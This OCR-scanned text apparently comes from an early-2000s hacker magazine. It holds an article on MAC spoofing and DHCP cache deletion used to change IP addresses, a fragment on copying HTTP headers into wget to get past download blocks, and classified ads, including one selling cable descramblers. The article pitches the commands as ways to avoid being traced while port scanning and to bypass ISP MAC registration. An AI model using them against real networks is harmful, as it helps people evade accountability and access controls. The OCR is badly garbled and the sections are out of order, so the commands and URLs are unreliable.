files: dheped-ethO.cache, dhcpcdethO.info, and 
dhcpcd-ethO.info.old. We can safely remove 
these files with an 'rm ñf /etc/dhepc/dhepc*ethO* 
because we don't want the DHCP server to 
know that we ever had an IP. The next thing we 
need to do is "change" the MAC address that 
will be sent to the server. First, make a note of 
your MAC address. It will be something like 
00:50:DA:0A:24:26. Let's change it to 
00:50:DA:0A:24:27 and try to get a new IP. 
First we need to take down the interface with an 
ifconfig ethO down' and then we can change the 
MAC address with an ‘ifconfig ethO hw ether 
00:50:DA:0A:24:27'. Now we bring the inter- 
lace back up with ‘ifconfig ethO up' and last but 
not least we request our new IP with '"/sbin/ifup 
cthO' and voila! You have a new IP. If you got 
the same IP you had before, you probably forgot 
to delete the cache in /etc/dhcpc. At this point it 
should be painfully clear how these concepts 
could be incorporated into a script for things 
like port scanning or whatever your devious 
mind desires. 

The Authenticating DHCP Server 

This is where it gets a little tricky. Some 
ISPs (like my ISP) require you to register your 
MAC address so they can control which com- 
puters have access to their network. So, what's a 
boy to do? 

Grab a list of IPs and MAC addresses, wait 
lor an IP-MAC address to go down, and use that 
MAC to fool the DHCP server into thinking that 
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has options to download a list of files, but 
usually just set up a bunch of wget commands 
in a batch file. 
Have fun with your knowledge of packet 
sniffing and HTTP headers! They are great 
tools for your own personal toolbox.... 
URLs Used 
Dice: http://www.ngthomas.co.uk/dice.htm 
Sniffit: http://reptile.rug.ac.be/-coder/sniffi/sniffit.html 
wget (Linux): http;//www.gnu.org/software/wgeuwget. html 
wget (Win32): http://space.tin.ivcomputer/hherold/ 
WinDump: http://windump.polito.it/ 


http://www.nodlme.com/videoS.html' \ 
http://www.downloadme.com/myDLman 
agerblockedfile.avi 

The file should begin to download prop- 
erly. If it gives you the "No Download Man- 
agers" message you might have missed 
another abnormal HTTP header. You can sniff 
the browser's request for the file and then sniff 
wget's request and see how they differ to find 
your missing header. Simply include the miss- 
ing header in your wget command with the -- 
header option. For serious downloading, wget 


DHCP is your friend! 




































the ones handing out the IPs (insert sarcasm 
here). So what if you could have 30 different” 
IPs in an hour/ That would sure make tracing 
you a lot harder. Easy, right? Just request a new 
IP from the magical DHCP server and rejoice. EL 
wish it were that simple. When you get an IP 
from the DHCP server it assigns you a leased 
This lease is the amount of time that it will give 
you the same IP. Also, some ISPs, like my local 
ISP, require you to register your MAC address 
with them or their DHCP server will never give 
you an IP in the first place. The MAC address 
(Media Access Control) is the unique hardware 
address given to your network card by its manus 
facturer. This gives them an extra level of "secu 
rity." Security is in quotes because I will) 
demonstrate how to fool the DHCP server inta 
thinking you are someone else. Lastly, you have 
a cache on your end that also says what IP you 
had last time you hooked up with the DHCP 
server. If your lease is still good the server w 
try to give you the same address again. This ii 
nice if you have a domain name registered to 8 
home account, but not so nice if you want to 0 
some port scanning. You would never do 
anything like that, right? 
Get To The Good Stuff Already! 

So now we know a little about how DHCP 
works. Let's get into how it can be useful. This 
article assumes that you are using a Linux box 
as a firewall/router for internal Windows boxes, 
I will also assume that you have installed the 
Cygwin package from RedHat on your Win- 
dows box. If you have not installed Cygwin you 
should really check it out. It gives you much 
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Did you ever wonder when you turn on your 
computer to surf the web how the heck your 
computer knows what IP to use? If you are read- 
ing this article, chances are you already know. 
For those who don't know, I will give you a lit- 
tle background before revealing how this magic 
can be used for good... err... evil... well... you 
can choose exactly how you use your newfound 
knowledge. This magical union between your 
computer and your ISP's server is known as 
DHCP (Dynamic Host Configuration Protocol). 
When you turn on your computer, or anytime 
you request it to, it sends a request via UDP on 
port 67 or 68 asking for information on how it 
should configure the network interface. Infor- 
mation like what DNS server to use, what IP 
and netmask to use. DHCP was created by the 
Dynamic Host Configuration Working Group of 
the Internet Engineering Task Force (wow, that 
was a mouthful). In this article I will concen- 
trate more on how it works than where it came 
from. We will leave its origins for a more boring 
article another time. I will also explain how to 
bend it to your will... 

Why Should I Care About DHCP? 

One of the first lessons every aspiring script 
kiddy learns is the importance of his IP. Your IP 
is what identifies you to the rest of the Internet. 
When you spew packets from your computer, 
this magic number is recorded all over the 
place, like footprints in the snow saying "I was 
here." The only people who can quickly trace 
this number to your actual computer are your 
service providers. Coincidentally they are also 
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www.2600.com/offthehook or on shortwave in North and South 
America at 7415 khz. Archives of all shows dating back to 1088 can 
be found at the 2600 site, now in mp3 format! Your feedback is wel- 
come at oth@2600.com. 

HACKERMIND: Dedicated to bringing you the opinions of those 
in the hacker world. Visit www.hackermind.net for details. 
VMYTHS.COM AUDIO RANTS arc available free of charge te 
computer talk shows. These short and often hilarious MP3s dispel 
the hysteria that surrounds computer viruses. The White House com» 
puter security advisor hates these rants (and we don't make this claim 
lightly). Check out Vmyths.com/news.cfm for details. 

WDCD - A WANTON DISPLAY OF CONTROL AND ۰ 
TION. WDCD is a half hour radio satire produced by a small group 
of otherwise unemployed individuals with roomfuls of old record 
ings, analog synthesizers, and racks full of strange electronics gear. 
Born out of the pirate radio scene, WDCD has existed in various 
forms on various unauthorized radio frequencies for longer than any 
of us care to recall (or want to admit to). You can hear WDCD every 
Friday at 6:30 pm ET on 7415 KHz shortwave and on other random 
frequencies. If you don't have a shortwave radio, you're missing out 
on some interesting stuff! Check out our website for more informa- 
tion: http://www.wdcdradio.com, Verified WDCD listeners will get a 
free surprise. WDCD Radio, 614 S 8th St. 4319, Philadelphia, PA 
19147, (215) 602-8328. Email mailbag @wdedradio.com. 

PRANK PHONE CALLS. Listen to the funniest prank phone calls 
ever at www.phatspot.com/swankpranks. 


HAVE YOU SEEN HONUS WAGNER? I am looking for Honus 
Wagner to catch up on old times; it's been over 10 years since we last 
spoke, Senior staff member of AciD, founder of RPM, and SysOp of 
the Final Fantasy BBS, Honus Wagner unconsciously played an im- 
portant role in the IBM-PC ANSI art world. On October 27th, 1992, 
Dateline NBC aired a sensationalized expose on “computer hackers” 
entitled "Are Your Secrets Safe?" which displayed a couple of adver- 
tisements for underground bulletin boards, one of them being Final 
Fantasy, Honus quickly vanished thereafter without a trace. If you 
know where to reach him (or are him), please email me at: rad- 

man @acid.org or visit 
http://www,bbsdocumentary.comvlooking.html. Rad Man, ACiD Pro 
ductions, PO Box 24523, San Jose, CA 95154-4523. 

STARTING ۸ HAXOR SUPPORT GROUP and need participa- 
tion from experienced and inexperienced haxors, crackers, and 
phreakers. If you would like to join this FREE service, write me at 
the address below. You may be asked to search for information on 
the "net to assist others with less experience or submit knowledge on 
techniques you know. Also, looking for political views and electronic 
projects as well as ideas for hacking for a magazine | am starting. 
Write to me at: Larry Heath Wheeler, 817592, 1098 S. Highway 
2037, Fort Stockton, Texas 79735. AII inquiries will be answered. 
ANOTHER HACKER IN PRISON! Don't cry for me, 1 did it to 
myself. | would like information (for educational purposes only, of 
course) where I can buy, how to build, ete., an RF device that I could 
point at a given garage door and it would scan and descramble, open 
sesame. I'm extremely interested in this technology. Anyone with 
more info or ideas, please contact me via snail mail at: Mark Carley 
P-24536, F2-116 L Chuckawalla Valley State Prison, PO Box 2349, 
Blythe, California 92226. Will answer all. 

YOUNG MAN WANTED for correspondence and/or possible long 
term relationship. Prefer guys under 21 who are either computer lit- 
erate or have a desire to learn and are honest and nonviolent in their 
relations. Especially interested in thin, smooth, young men. Drop me 
a line (and a bare as you dare photo if you wish) to me at; Dwayne, 
PO Box 292067, Lewisville, TX 75029-2067. 


ONLY SUBSCRIBERS CAN ADVERTISE IN 26001 Don't even 
think about trying to take out an ad unless you subscribe! All ads are 
free and there is no amount of money we will accept for a non-sub- 
scriber ad. We hope that's clear. Of course, we reserve the right to 
pass judgment on your ad and not print it if it's amazingly stupid or 
has nothing at all to do with the hacker world. We make no guarantee 
as to the honesty, righteousness, sanity, etc. of the people advertising 
here. Contact them at your peril. All submissions ure for ONE IS- 
SUE ONLY! If you want to run your ad more than once you must re- 
submit it cach time. Don't expect us to run more than one ad for you 
in a single issue either. Include your address label or à photocopy so 
we know you're a subscriber. Send your ad to 2600 Marketplace, PO 
Box 99, Middle Island, NY 11953. Deadline for Spring issue: 3/1/03. 
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ing DOS based search engine for retrieval. Please advise if there ex- 
ists any tools currently available or anyone who may be of help. 
jyohndp4 @ hotmail.com. 

| NEED TO BUILD A HIDDEN CAMERA SYSTEM including 
sound on a limited budget to take with me on my visits with my 
child in order to prove that everything is going well. Please e-mail 
any recommendations to lovepulse @ yahoo.com, fax (208) 330-0256. 
LOCKSMITHS: | am in need of a keymaker from only a picture 
and a pencil sketch over of a key. Pending on timing and location, I 
may be able to get the key for a Saturday or Sunday afternoon meet- 
ing. Lam in Kenosha, WI, so I can only go to Milwaukee or North 
Chicago for meetings. Please e-mail at Mifster88 G hotmail.com if 
interested, make the subject "keymaker.” 


YOU MAY BE NEXT? GIVE ME LIBERTY... One million signa- 
tures needed on PETITION to U.S. Senate "Committee on the Judi- 
ciary" to investigate the shocking but true facts of Americans being 
indicted and convicted illegally by U.S. Judge Robert G. Renner. We 
ask you to stand with us and let the Voice of Freedom be heard as to 
the injustice done to John Gregory Lambros. PLEASE VISIT: 
www.petitiononline.com/jlambros/petition.html. Documents support- 
ing the petition to Senator Charles E. Grassley are available within 
the Boycott Brazil web site: www.brazilboycott.org. THANK YOU. 
NEED TECHNICAL ILLUSTRATOR. I'm writing a book on se- 
curity circumvention, lock picking, bypass, safes, alarms, and other 
subjects. I need someone experienced at technical drawings to create 
original black and white illustrations for my book. I live in the Dal- 
las-Fort Worth area of Texas and would prefer someone of college 
uge nearby, although we could probably manage long distance col- 
laboration. This will be unpaid work for both of us until the book 
gets published, at which point we'd split the profits equally. I intend 
to offer it to Loompanics or Delta Press, and have every confidence 
that they'll want to publish it. Pleasé contact me at 

drill_relocker@ yahoo.com if interested! 

REWARD for code used on NOKIA cell phones to continuously 
monitor a cell phone channel. Code allows continuous reception on a 
channel for test purposes. Reply to: response2600@ yahoo.com. 


INTELLIGENT HACKERS UNIX SHELL. Reverse.Net is 
owned and operated by intelligent hackers. We believe every user 
has the right to online security and privacy. In today's hostile anti- 
hacker atmosphere, intelligent hackers require the need for a secure 
place to work, without big-brother looking over their shoulder. We 
provide highly filtered DoS protection. Our main server is a P3 1.2 
ghz machine, 1.5 gigs of ram, 512 megs of swap, 40 gig EIDE, with 
complete online "privacy." Compile your favorite security tools, use 
ssh, stunnel, nmap, etc. Affordable pricing from $10/month, with a 
14 day money back guarantee. http;//www.reverse.net/ 

NOW YOU CAN CHARGE A FEE for receiving unexpected 
email. www.pay2send.com is accepting beta-testers. PayToSend is a 
TipJar company. 

SUSPECTED OR ACCUSED OF A CYBERCRIME IN ANY 
CALIFORNIA OR FEDERAL COURT? Consult with a semantic 
warrior committed to the liberation of information specializing in 
hacker, cracker, and phreak defense. Contact Omar Figueroa, Esg., at 
(800) 986-5591 or (415) 986-5591, at omar@aya.yale.edu, or at 506 
Broadway, San Francisco, CA 94133. Free personal consultation for 
2600 readers. All consultations are strictly confidential and protected 
by the attorney-client privilege. 

FORMER CYBERCRIME PROSECUTOR now defends those 
investigated or charged with this type of crime. Having been on the 
other side, I know how the system works and how the government 
can target YOU! With prosecutors probably wanting you to serve 
prison time, you need a proven veteran trial attorney who knows 
how to handle these cases and who knows how to defend your rights. 
Jason D. Lamm, Esq. (602) 22-CYBER (222-9237). Lamm & Asso- 
ciates, 5050 N. 8th Place, Suite 12, Phoenix, AZ 85014. Free confi- 
dential and professional consultation. 

GENERAL PURPOSE EMAIL IDENTITY AUTHENTICA- 
TION SERVICE for use from CGI programs. Legitimate uses only 
please. http://tipjar.com/nettoys/TJAIS.html 


OFF THE HOOK is the weekly one hour hacker radio show pre- 
sented Wednesday nights at 7:00 pm ET on WBAI 99.5 FM in New 
York City. You can also tune in over the net at 
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MACINTOSH HACKERS can get all the mac underground files on 
a professionally published CD. 650 Megs of PURE macfilez. In- 
cludes the Defcon 7 Macintosh security speech, the whole Freaks 
Macintosh Archives and Whacked Mac Archives. $25.00 USD - will 
ship internationally. SecureMac, PMB 310, 6170 W. Lake Mead 
Blvd., Las Vegas, NV 89108, USA. Hack from your Mac! 
HACKER T-SHIRTS FROM YOUR FAVORITE GROUPS, 
along with a plethora of our own designs. Jinx Hackwear is selling t- 
shirts, sweatshirts, and hats for groups such as Defcon, Phrack Mag- 
azine, Cult of the Dead Cow, Packet Storm, HNC, Collusion, 
Password Crackers Inc., HNS, Hackers.com, Astalavista, and New 
Order. New site with Forums, Hacker News, Conference Updates, 
LAN Party listings, a Photo Gallery, and a chance to Speak Out. 
Check it out! http://wwwJinxHackwear.com 
LEARN LOCK PICKING It's EASY with our new book. We've 
just released a new edition adding lots more interesting material and 
illustrations. Learn what they don't want you to know. Any security 
system can be beaten, many times right through the front door. Be 
secure. Learn the secrets and weakness of today's locks. If you want 
to get where you are not supposed to be, this book could be your an- 
swer. Explore the empowering world of lock picking. Send twenty 
bucks to Standard Publications, PO Box 2226HQ, Champaign, IL 
61825 or visit us at www.standardpublications.com/direct/2600.html 
for your 2600 reader price discount. 
COVERTACCESS.COM. Amazing EQUIPMENT and SERVICES 
providing you with the physical and records access you need! 
OVER 150 TELECOM MANUALS are now available online for 
free viewing/downloading at The Synergy Global Network's fully re- 
designed website. Most being available in Adobe PDF format, they 
are crisp, clean, suitable for printing, and complete. Update your ۱ 
phreak library now before it's too late, We don't know how long this 
website will be allowed to distribute these manuals, however they 
are yours for the time being. Our website is free and open to the pub- 
lic, and requires no purchase of any kind, and is also free from pop- 
up (or pop under) advertisements as well. PAYPHONE SERVICE 
MANUALS TOO! Visit us online at: http://www.synergyglobalnet- 
works.com, 
CAP'N CRUNCH WHISTLES. Brand new, only a few left. THE 
ORIGINAL WHISTLE in mint condition, never used. Join the elite 
few who own this treasure! Once they are gone, that is it - there are 
no more! Keychain hole for keyring. Identify yourself at meetings, 
etc. که‎ a 2600 member by dangling your keychain and saying noth- 
ing. Cover one hole and get exactly 2600 hz, cover the other hole 
and get another frequency. Use both holes to call your dog or dol- 
phin. Also, ideal for telephone remote control devices. Price includes 
mailing. $99.95. Not only a collector's item but a VERY USEFUL 
device to carry at all times. Cash or money order only. Mail to: 
WHISTLE, P.O. Box 11562-ST, Ch, Missouri 63105. 
HATE MICROSOFT? Or do they just leave a foul aftertaste? Show 
your dissatisfaction with a "Calvin peeing on Microsoft" sticker. 
Sticker is approx. 7"x9" and fits nicely in a car window or even on 
the side of your favorite *nix box. Each sticker is made of commer- 
cial grade vinyl. Water and UV ray resistant. To see a sample go to 
http://calvinhatesmicrosoft.hypermart.net. $7.00 (US), $10.00 (US) 
for international. Order the Calvin sticker and the MS logo is yours 
free. That's right, THE MICROSOFT LOGO IS FREE (eat that one, 
Bill). Send all orders to CD Mayne, PO Box 571791, Murray, Utah 
84157 USA. Cash or money orders only. No checks, credit cards, or 
COD. Allow 2-3 weeks for delivery via USPS. 


HIRING PROFESSIONAL INTERNET CONSULTANTS with 
job references only for the following: website security, performance 
tuning, and marketing for online magazine. Please send your bio and 
resume to: jbhartsworth@ yahoo.com -you can work from home, but 
should live in (or around) NYC, as you will need to attend a meeting 
or two. 

NEED ASSISTANCE to rescue/recover ASCII text data which are 
presently compressed/encrypted by some type of commercial pro- 
gram. Most files are rather large, from 30MB to about 600MB. Us- 
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INTERZONE IL April 11-13, 2003. Atlanta's hacker con is doing 
another eye opener! Come educate or gain knowledge in today's is- 
sues. All needed info is on site: www.interzÜne.com or email: con- 
tact@interzOne.com. (That's interzÜne, spelt with a zero!) 

SAN FRANCISCO OPENBSD USERS GROUP - now meeting 
once a month at Goat Mill Pizza, first Mondays at 7 pm - for info see 
http://www.sfobug.org. 


IP-BLIND OUTGOING SMTP TUNNEL suitable for installation 
behind any web-proxy firewall, $80 per year. Will completely disas- 
sociate your outgoing emails from your employer's network. Send 
check to Tipjar, Box 45163, Kansas City, MO 64171. Include a good 
email address for yourself where we will send you tbe client half of 
the software. This is for privacy and sidestepping restrictive corpo- 
rate communications directives, NOT bulk mail or other T.O.S. vio- 
lations. Your check will not be deposited until you declare your 
satisfaction. 
HACKERSTICKERS.COM - Get your geekish nerd related hacker 
stickers for your laptops, cars, and gear. All different colors and new 
designs. www.hackerstickers.com. 
THE SLICER'S GUILD, a slowly growing group, is taking orders 
for our first issue of the Slicer's Guild magazine. For only $5 (U.S.), 
find out why we call ourselves "slicers" and why our hacker maga- 
zine is complementary to 2600 and not competitive. This will not be 
offered as a subscription yet. You will have to check Marketplace for 
when the second issue becomes available. Send your request with a 
money order along with anything else you might want to be printed 
in a future issue to: Larry Heath Whecler 817592, 1098 S. Hwy 
2037, Fort Stockton, TX 79735 USA. 
WORLD'S FIRST "DIGITAL DRUG." Hackers, get ready to ex- 
perience the next level in wetware technology! VoodooMagickBox is 
a 100% legal and safe way to enter into a drug-like trip, All you need 
to do is place the clips on your ears and turn the knob on the 
VoodooMagickBox. It’s like nothing you've ever tried! For details 
and ordering information, visit www.voodoomagickbox.com (money 
orders and credit cards accepted). 
CABLE TV DESCRAMBLERS. New. (2) Each $115 + $5.00 ship- 
ping, money order/cash only. Works on analog or analog/digital ca- 
ble systems. Premium channels and possibly PPV depending on 
system. Complete with 110vac power supply. Purchaser assumes 
sole responsibility for notifying cable operator of use of descrambler. 
Requires a cable TV converter (i.e., Radio Shack) to be used with the 
unit. Cable connects to the converter, then the descrambler, then the 
output goes to TV set tuned to channel 3. CD 9621 Olive, Box 
28992-TS, Olivettet Sur, Missouri 63132, Email: cabledescrambler- 
guy @ yahoo.com. 
REAL WORLD HACKING: Interested in rooftops, steam tunnels, 
and the like? For a copy of Infiltration, the zine about going places 
you're not supposed to go, send $2 to PO Box 13, Station E, Toronto, 
ON M6H 4E1, Canada. 
INTERESTED IN PIRATE AND LEGAL DO-IT-YOURSELF 
RADIO? Hobby Broadcasting magazine is dedicated to DIY radio 
and broadcasting of all types. 52 pages. $3/sample, $13/4 issues to 
Hobby Broadcasting, POB 642, Mont Alto, PA 17237 www.hobby- 
broadcasting.com. 
WWW.PROTECT-ONE.COM. Protect yourself! Everyone has a 
need to be and feel safe from the outside world. We carry « full line 
of self defense, security, and surveillance products at low prices. 
Everything from alarms to mini cameras to telescopic batons to stun 
guns and more! Check us out, all major credit cards accepted. We 
ship worldwide! ۲ 
FREEDOM DOWNTIME, the feature-length 2600 documentary, is 
now available on video! See the adventure unfold as we try to get to 
the bottom of the Kevin Mitnick story and prevent a major motion 
picture from spreading more lies. Available on VHS in NTSC (U.S.) 
format, 121 minutes, Send $20 to 2600, PO Box 752, Middle Island, 
NY 11953 or order via our online store at www.2600.com. 
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Stargard Szezecinski: Art Caf 
Bring blue book. 7 pm 


RUSSIA 
Moscow: Burger Queen cafe ne 
TAR/TASU (Telephone Agency of 
Russia/Telegraph Agency of Soviet 
Union) « also known as Nicitski 
Vorota 


SCOTLAND 


tral Station, pay 





Gluagow: 
phones next to Platform 1.7 pm 
SOUTH AFRICA 
Johannesburg (Sandton City): 
Sandton food court. 6:30 pm 
SWEDEN 
Gavle: Railroad station 
Stockholm: Outside Lava 
UNITED STATES 
Alabama 
Auburn: The student lounge 
I in the Foy Union Building 
m 
Birmingham: H 
food court. 7 pr 
Huntsville: Ma 


in the food cour 


ison Square Mall 
McDonald's 

7 pm 

Tuscaloosa: McFarland Mall food 

ear the front entra: 





Arizona 
Tempe: Game Works at A 
Milly Mall 
Arkansas 
Mail f« our 





Jonesbort 


by the big 





lows. 


Californ 








Los Angeles: Union Station, corner 


۱۲ Macy & Alam 


titrance by bx 


la. ۱۶ 





f phones 
phones: (213)9 


992 





3924: 613-9704, 974€ 





Orange County (Laguna Niguel): 
10 Alicia Parkway 


Natale Cot 
ut 

b 
R 
Mall 

Sun Francisco: 4 Emba 
Plaza (inside). ۷ 
398-9805, 9804, 9805, 9806. 


un Diego: | dia's Pizzeria on 






nts Road (Vons Shopping 





dert 








San Jose (Campbell): Orchard Va 

y Coffee Shop/Net Cafe on the 
corner of S Cent Ave. and I 
Campbell Ave 
Santa Barbara: ( 
State Strec 


Colorado 
Boulder: Fatty J' food court, | 3 
nd College. 6 pm. 

Connecticut 
Meriden: Meriden Square Mall 


food court. 6 pm 





District of Columbia 
Arlington: Pentagon City Ma 


ARGENTINA 








Buenos Aires: In the bur at San 
AUSTRALIA 
Adelaide: At the payphones nca 
beAcademy Chema on Piltene 
$t 8 
Brisbane: Hungry Jacks on th 
Queen St. Mall (RHS, opp I 
Booth). 7 p 
Canberra: KC's V Reali 
Cafe, 11 East RW, € "m 
Melbourne: Melbou Cent 
Shopping Centre at the Swar 
Street entrance nea: publi 
phon 
Perth: The M it Tea and 
fee Ho 83 Murray SL 6 pi 
Sydney: The Crystal Palace, front 
bar/bistro, opposite the bus static 
irea on Georg street at Cer 1 
Statio 6 pm 
AUSTRIA 
Graz: Cafe Haltestelle on 
Jakominiplatz 
BRAZII 
Belo Horizonte: Pelego's Bar at 
Assufeng. neat the payphone. 6 pm 
CANADA 
Alberta 
Calgary: Eau Claire Market food 
court by the bland Yellow wall 
rmerly the "miik wa 
Edmonton: Edmonton City Cent 
Lower Le West in the food court 
by the payphon 
British Columbin 








Vancouver: Pa t Food 
F one level down from street 
level by payphones. 4 pmi to 9 pm 
Victoria: Eaton Center food court 
by A&W 
New Brunswick 
Moncton: Ground Zero Netwo 
0M 
Ontario 
Barrie: William's Coffee Pub, 505 
1 rive, 7 gm. 
Hamilton: Jackson Square food 


à 
pun by p hones and Burger 
King. 7:30 pm 


Toronto: Computer Security Edu 








cation Facility, 199a College Street 
Quebec 
Montreal: Bell Amphitheatre, 1000 
Gauchetiere Street 
DENMARK 
Aarhus: In the far corner of the 
DSB caf the railway pation 
Copenhagen: Terminalbor in How 
dhanegardens Shopping Ce 
ENGLAND 
Bristol: Next to the orar 
grey payphones opposite t 
Game ۱8۵, Merchant Strect 
Broadmead, Payphawes; +44 | 
29901 129449 M) pm. 
Exeter: at the payphones, Bedford 


uare. 7 pi 





London: Trocadero Shopping 
ter (near Picadilly Circus), lowe: 
evel. 7 p 

Manchester: Th 


en Room or 





G 





N worth Street 








FINLAND 
Helsinki: Media Piazza near the 
Modesty coffee shop 
lVoolonlahdeénkatu 
FRANCE 
Paris: Place de la Republiq nea 
he (empty) fountain. 6 pa 
GREECE 
Athens: Outside the books ۱ 
I irio th rner of Patisior 
| nari. 7 pm 
ITALY 
Milan t Loreto in froat of 
McDo 
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South ۷ 5 


(we will pay any price for pictures of North Korean payphones) 


Seoul. Th common type of payphone whic Seoul. A coins-only version, also fairly common 


only accepts cards and usually found near the cards-only phones, 


— 


Kyeonghee University. The old coins-only Seoul. This is a rare phone too. Its location is 


payphone which is becoming inc gly rare probably even more rare 


Photos by Robin Kearey 


on the other side of this page for even more phe 





